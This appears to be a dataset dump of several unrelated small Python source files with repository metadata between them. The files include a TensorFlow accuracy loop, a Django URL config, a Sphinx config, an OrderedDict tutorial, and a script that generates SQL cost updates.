print ("Testing trained model...")
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
sum_accuracy = 0
for _ in range(tests_count):
        x_test, y_test = sess.run([x_test_Tensor, y_test_Tensor])
        # Convert the test batch to a single luminance channel and flatten it.
        x_2d = rgb_to_y(x_test[:,:,:,0], x_test[:,:,:,1], x_test[:,:,:,2])
        x_test = x_2d.reshape(test_batch_size, -1) / 255
resize_test_y = np.zeros ([len(y_test), 3])
resize_test_y[range(len(y_test)), y_test] = 1
sum_accuracy += sess.run(accuracy, feed_dict={x: x_test, y: resize_test_y})
print("Accuracy: {:f}".format(sum_accuracy / tests_count))
coord.request_stop()
coord.join(threads)
|
[
"bespalov.maxim.a@gmail.com"
] |
bespalov.maxim.a@gmail.com
|
4dcec4c4fe540cd895c7929f3502d6567240ec98
|
ae0014e2bd7700d6b9c63055a74b0f68752c72bd
|
/interdiction/win.py
|
d49fb575a207bb129edd302cee2e7f2c90b7a144
|
[] |
no_license
|
Anderson-Cooper/Elite-Py
|
f8659f01e35c33455b1c52610fdfe88c54860523
|
af10235446c94ba5a8a454014b18d34faec21840
|
refs/heads/master
| 2023-07-24T02:08:39.986386
| 2020-02-28T00:01:32
| 2020-02-28T00:01:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
print("You DEMOLISHED your enemy, you used his ship parts to repair your ship, And you have his court hearing soon so you will be taken to A-96-A")
|
[
"apollopulk@gmail.com"
] |
apollopulk@gmail.com
|
ddf22e15b1dca17e2d83a188596d14e2a2085f9d
|
3e2dc3be3361c25680adb450a0010a5c3069670d
|
/pets.py
|
401d48f17adb1fce2a80cc9bc0ae3d35063d7dc7
|
[] |
no_license
|
PrashishMan/python_init
|
0880b6eb9a0dfd853c79a300d31cc67e1c1f3d6d
|
5edc9c28efc75684476cde319262a6ae5054fcb8
|
refs/heads/master
| 2020-06-15T08:25:52.157207
| 2019-07-04T13:37:10
| 2019-07-04T13:37:10
| 195,248,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
from inheritance import b
class Pet:
allowed = ["cat", "dog", "fish", "gecko"]
@classmethod
def class_attribute(cls):
print(cls.allowed)
def __init__(self, name, species):
if species.lower() not in Pet.allowed:
raise ValueError(f"You cannot have a {species} pet")
self.name = name
self.species = species
def set_species(self, species):
if species.lower() not in Pet.allowed:
raise ValueError(f"You cannot have a {species} pet")
self.species = species
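# Species validation in action: anything outside Pet.allowed raises ValueError, e.g.
# Pet("rex", "dragon")  # ValueError: You cannot have a dragon pet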
cat = Pet("vla", "cat")
dog = Pet("chinkey", "dog")
Pet.class_attribute()
print(b)
|
[
"prashishmansingh@Prashishs-MacBook-Pro.local"
] |
prashishmansingh@Prashishs-MacBook-Pro.local
|
9fa9501354ccb47bd2b1c9941aa2838909db9cae
|
f6b50c0f68ec0c7a239ea8cf2e05b6eaa718372d
|
/cha1数据结构和算法/1.7字典排序.py
|
bcdaec1df117a165581bda26c5f5aef07f4a59af
|
[] |
no_license
|
Pluto13579/Python3-cookbook
|
23e05abc15fbd95b4a61b2f2905996e4e0883ebb
|
0ba46aa98035a7ce63ccca4e15f0bc7130f88372
|
refs/heads/master
| 2020-04-10T21:46:25.473564
| 2019-01-27T05:49:46
| 2019-01-27T05:49:46
| 161,306,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
# The OrderedDict class in the collections module can be used to control the order of the items in a dictionary.
# An OrderedDict internally maintains a doubly linked list sorted by key insertion order; every newly inserted item is appended to the end of that list.
# Re-assigning an existing key does not change its position in the order.
# Note that an OrderedDict is twice the size of a regular dictionary, because of the extra linked list it maintains.
from collections import OrderedDict
d = OrderedDict()
d['foo'] = 1
d['bar'] = 2
d['spam'] = 3
d['grok'] = 4
for key in d: # Outputs "foo 1", "bar 2", "spam 3", "grok 4"
print(key, d[key])
# An OrderedDict can also precisely control the field order of JSON-encoded output; build the data with an OrderedDict first:
import json
json.dumps(d) #{"foo": 1, "bar": 2, "spam": 3, "grok": 4}
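# Demonstrating the note above: re-assigning an existing key keeps its position.
d['foo'] = 10
print(list(d))  # still ['foo', 'bar', 'spam', 'grok']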
|
[
"1134369366@qq.com"
] |
1134369366@qq.com
|
807657e50b6e6f7c7877b940ddd11fcf6634620e
|
60a33ff566330b0bfcfa09efb8ede669afb1a800
|
/example/docs/conf.py
|
7f504b31adccd76ab3c6e21ff9546b0526827dee
|
[
"MIT"
] |
permissive
|
clayrisser/pipedoc
|
20674b0daf41ff7aece40b71b7505653b3142fdb
|
7e21e68641e5368d7f7d60d539d674d4d73bac5e
|
refs/heads/main
| 2023-08-03T12:43:45.288494
| 2023-07-13T11:32:31
| 2023-07-13T11:32:31
| 238,533,996
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,967
|
py
|
# from sphinx_markdown_parser.parser import MarkdownParser
from recommonmark.transform import AutoStructify
author = 'Jam Risser'
copyright = '2020, '+author
description = ''
doc_root = 'https://github.com/rtfd/recommonmark/tree/master/doc/'
html_static_path = ['_static']
html_theme = 'sphinx_rtd_theme'
project = 'pipedoc-example'
htmlhelp_basename = project+'doc'
js_language = 'typescript'
js_source_paths = ['../../../../src']
language = None
master_doc = 'index'
needs_sphinx = '1.0'
primary_domain = 'js'
pygments_style = 'sphinx'
release = '0.0.6'
templates_path = ['_templates']
todo_include_todos = False
extensions = [
'recommonmark',
'sphinx.ext.mathjax',
'sphinx_js'
]
latex_documents = [(
master_doc,
project+'.tex',
project+' documentation',
author,
'manual'
)]
latex_elements = {
'papersize': 'letterpaper',
'pointsize': '10pt',
'preamble': '',
'figure_align': 'htbp'
}
man_pages = [(
master_doc,
project,
project+' documentation',
[author],
1
)]
exclude_patterns = [
'dist/**/*',
'env/**/*'
]
texinfo_documents = [(
master_doc,
project,
project+' documentation',
author,
project,
description,
'Miscellaneous'
)]
def setup(app):
# app.add_source_parser(MarkdownParser)
# app.add_source_suffix('.md', 'markdown')
# app.add_config_value('markdown_parser_config', {
app.add_config_value('recommonmark_config', {
        'auto_toc_tree_section': 'Contents',
'enable_auto_doc_ref': True,
'enable_auto_toc_tree': True,
'enable_eval_rst': True,
'url_resolver': lambda url: doc_root + url,
# 'extensions': [
# 'extra',
# 'nl2br',
# 'pymdownx.arithmatex',
# 'sane_lists',
# 'smarty',
# 'toc',
# 'wikilinks'
# ],
}, True)
app.add_transform(AutoStructify)
|
[
"jam@codejam.ninja"
] |
jam@codejam.ninja
|
fdfcc529f6d09a71f492eb3dcbb32d0cd8eccb2a
|
2e5b5b3dacd4853ec335bf7026a24e2d294c98ce
|
/python-backend/controller/__init__.py
|
e742fdbf3dc8d2d1c2c3699953b00cf2d39107ab
|
[] |
no_license
|
DyvakYA/python-reactjs
|
19f75bd6278a3f4c4fcfaedf3d5c64a8e85febf2
|
3d0af66148caafb3e4450acd38a34ad6a092ed24
|
refs/heads/master
| 2020-04-27T21:01:15.508287
| 2019-03-10T17:50:47
| 2019-03-10T17:50:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
# Import the Framework
from flask import Flask
from flask_restful import Api
from .connection import get_connection
from .user_controller import User
from .user_controller import Users
# Create the instance of Flask
app = Flask(__name__)
# Create the API
api = Api(app)
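# Register the REST endpoints: the user collection and a single user looked up by id.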
api.add_resource(Users, '/users')
api.add_resource(User, '/users/<string:id>')
|
[
"dyvakyurii@gmail.com"
] |
dyvakyurii@gmail.com
|
b968c173c17ee7e0970eab6d6e3ee7ba4a7e8ab9
|
ca77e9e45d666771c7b0897e7e3093b3d3c12f65
|
/random_scripts/update_costs/update_wo_costs.py
|
20ad1cd9856990dbe5c11c2b9e38c6a9d2275cf5
|
[] |
no_license
|
2gDigitalPost/custom
|
46175d3a3fc4c3be21dc20203ff0a48fb93b5639
|
6a3a804ef4ef6178044b70ad1e4bc5c56ab42d8d
|
refs/heads/master
| 2020-04-04T07:40:17.962611
| 2016-12-28T18:35:28
| 2016-12-28T18:35:28
| 39,648,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,309
|
py
|
import os, sys, math, hashlib, getopt, tacticenv, time
def kill_mul_spaces(origstrg):
    # Collapse runs of whitespace into single spaces.
    return ' '.join(origstrg.split())
def make_data_dict(file_name):
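    """Parse a tab-separated file into {code: {field_name: value}}: the first
    row supplies the field names and the first column of each later row is the code."""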
the_file = open(file_name, 'r')
fields = []
data_dict = {}
count = 0
for line in the_file:
line = line.rstrip('\r\n')
data = line.split('\t')
if count == 0:
for field in data:
field = kill_mul_spaces(field)
field = field.strip(' ')
fields.append(field)
else:
data_count = 0
this_code = ''
for val in data:
val = kill_mul_spaces(val)
val = val.strip(' ')
if data_count == 0:
data_dict[val] = {}
this_code = val
else:
data_dict[this_code][fields[data_count]] = val
data_count = data_count + 1
count = count + 1
the_file.close()
print "FIELDS = %s" % fields
return data_dict
opts, work_order_file = getopt.getopt(sys.argv[1], '-m')
print("work_order_file = %s" % work_order_file)
opts, task_file = getopt.getopt(sys.argv[2], '-m')
print("task_file = %s" % task_file)
opts, group_file = getopt.getopt(sys.argv[3], '-m')
print("group_file = %s" % group_file)
opts, login_in_group_file = getopt.getopt(sys.argv[4], '-m')
print("login_in_group_file = %s" % login_in_group_file)
opts, work_hour_file = getopt.getopt(sys.argv[5], '-m')
print("work_hour_file = %s" % work_hour_file)
lookup_codes = {}
work_orders = make_data_dict(work_order_file)
#print "WORK ORDERS = %s" % work_orders
tasks = make_data_dict(task_file)
#print "TASKS = %s" % tasks
groups = make_data_dict(group_file)
#print "GROUPS = %s" % groups
login_in_groups = make_data_dict(login_in_group_file)
#print "LOGIN IN GROUPS = %s" % login_in_groups
work_hours = make_data_dict(work_hour_file)
#print "WORK HOURS = %s" % work_hours
work_order_codes = work_orders.keys()
task_codes = tasks.keys()
work_hour_codes = work_hours.keys()
out_lines = []
problem_lines = []
for woc in work_order_codes:
    # Expected cost first: estimated work hours * the work group's hourly rate.
s_status = work_orders[woc]['s_status']
if s_status not in ['retired','r']:
work_group = work_orders[woc]['work_group']
estimated_work_hours = work_orders[woc]['estimated_work_hours']
if work_group not in [None,''] and estimated_work_hours not in [None,'',0,'0']:
estimated_work_hours = float(estimated_work_hours)
group_rate = groups[work_group]['hourly_rate']
if group_rate not in [None,'']:
group_rate = float(group_rate)
new_expected_cost = float(estimated_work_hours * group_rate)
out_lines.append("update work_order set expected_cost = '%s' where code = '%s';" % (new_expected_cost, woc))
else:
problem_lines.append("Work Order %s is incomplete. Work Group = %s, Est_WH = %s" % (woc, work_group, estimated_work_hours))
task_code = work_orders[woc]['task_code']
if task_code not in [None,'']:
summed_actual_cost = 0
if task_code in task_codes:
if tasks[task_code]['s_status'] not in ['retired','r']:
for whc in work_hour_codes:
if work_hours[whc]['task_code'] == task_code:
user = work_hours[whc]['login']
straight_time = work_hours[whc]['straight_time']
if straight_time not in [None,'',0,'0']:
straight_time = float(straight_time)
group_chosen = ''
group_rate = 0
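                                # Charge the user's highest-rate login group (seeded with the first group found).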
for lg in login_in_groups.keys():
if login_in_groups[lg]['login'] == user:
if group_chosen == '':
group_chosen = login_in_groups[lg]['login_group']
if group_chosen in groups.keys():
group_rate = groups[group_chosen]['hourly_rate']
if group_rate not in [None,'',0,'0.0']:
group_rate = float(group_rate)
else:
group_rate = 0
else:
this_group = login_in_groups[lg]['login_group']
if this_group in groups.keys():
this_rate = groups[this_group]['hourly_rate']
if this_rate not in [None,'',0,'0.0']:
this_rate = float(this_rate)
else:
this_rate = 0
if this_rate > group_rate:
group_rate = this_rate
group_chosen = this_group
if group_rate not in [None,'']:
if group_rate == 0:
problem_lines.append("GROUP RATE WAS 0 for %s, user %s, group %s" % (whc, user, group_chosen))
else:
summed_actual_cost = summed_actual_cost + float(group_rate * straight_time)
if summed_actual_cost not in [None,'']:
out_lines.append("update work_order set actual_cost = '%s' where code = '%s';" % (summed_actual_cost, woc))
out_file = open('work_order_cost_fix','w')
for ol in out_lines:
out_file.write('%s\n' % ol)
out_file.close()
problem_file = open('work_order_cost_problems', 'w')
for pl in problem_lines:
problem_file.write('%s\n' % pl)
problem_file.close()
|
[
"topher.hughes@2gdigital.com"
] |
topher.hughes@2gdigital.com
|
dd789a1204e77259fb9bd8ee205a84343a7c5853
|
37624df48e42799c07e65760f38ca6b9d31bf9e5
|
/python/sensor/weights/hx711py/avg.py
|
51bbbaf1b6c8544e421e17a0ad721feb484e2f56
|
[
"Apache-2.0"
] |
permissive
|
DJ956/YoloBarcodeReader
|
f2ac330657430d1d1f9d02b9f1af76485b2afb13
|
148f387a8dce260a2dc54398702e20e0d6e6a7ac
|
refs/heads/master
| 2020-08-16T07:32:52.220478
| 2020-02-16T04:41:37
| 2020-02-16T04:41:37
| 215,473,285
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
with open("log.txt", "r") as f:
cnt = 1
line = f.readline()
sum = float(line)
while line:
print(line.strip())
sum = sum + float(line.strip())
line = f.readline()
cnt = cnt + 1
avg = sum / cnt
print("AVG:{}".format(avg))
|
[
"dexter13576@gmail.com"
] |
dexter13576@gmail.com
|
c5eccff0d3c5b636c09a0a75b58b010407af82e4
|
0e5b1f367fa867f16ef4bfb949e9139dd801030a
|
/notehub/apps.py
|
88f21271796aba9fb5ddad69dcba762e4b2541eb
|
[] |
no_license
|
polgodia/NoteHub
|
88b4493b74f48feadef7800a0bb9434eea4796b0
|
9dddef321267899b4e6989e1166b2728af9a4f29
|
refs/heads/master
| 2023-05-02T03:27:14.486998
| 2020-03-28T20:08:15
| 2020-03-28T20:08:15
| 245,120,301
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
from django.apps import AppConfig
class Django_App(AppConfig):
name = 'notehub'
|
[
"pgs8@alumnes.udl.cat"
] |
pgs8@alumnes.udl.cat
|
123f7dbef56d9142e08ed7b8ee92470e4423872f
|
ecc4e74a46f17120587a90cf63d6d29990865c3a
|
/Django_Level_Three/ProTwo/ProTwo/urls.py
|
0f227f7a243767cbb5d77a10555f69926a99c187
|
[] |
no_license
|
darthVader18/my_django
|
5b67d273b15ae5ce7f4dc6dec12a7ccf746a4604
|
5e682e31cd1e7d1c54d5e4b672f7e8a9b5b98695
|
refs/heads/master
| 2020-06-26T21:42:49.369120
| 2020-03-24T09:50:14
| 2020-03-24T09:50:14
| 199,699,737
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
"""ProTwo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.urls import path
from django.conf import settings
from appTwo import views
urlpatterns = [
path('', include('appTwo.urls')),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
url(r'^__debug__/', include(debug_toolbar.urls))
] + urlpatterns
|
[
"50162503+darthVader18@users.noreply.github.com"
] |
50162503+darthVader18@users.noreply.github.com
|
a64456fc0046b8a42ad60ddaa19ba450e3c4bfac
|
4a7804ee05485c345b4e3c39a0c96ed4012542ac
|
/editor/emacs/emacs-python/actions.py
|
b0523c81855ca5f5c430977b55c02381e42c60ee
|
[] |
no_license
|
Erick-Pardus/Pardus
|
1fef143c117c62a40e3779c3d09f5fd49b5a6f5c
|
2693e89d53304a216a8822978e13f646dce9b1d3
|
refs/heads/master
| 2020-12-31T02:49:33.189799
| 2013-03-17T06:29:33
| 2013-03-17T06:29:33
| 17,247,989
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
WorkDir = "python-mode.el-6.0.11"
def install():
pisitools.insinto("/usr/share/emacs/site-lisp/python", "*.el", "python-mode.el")
|
[
"namso-01@hotmail.it"
] |
namso-01@hotmail.it
|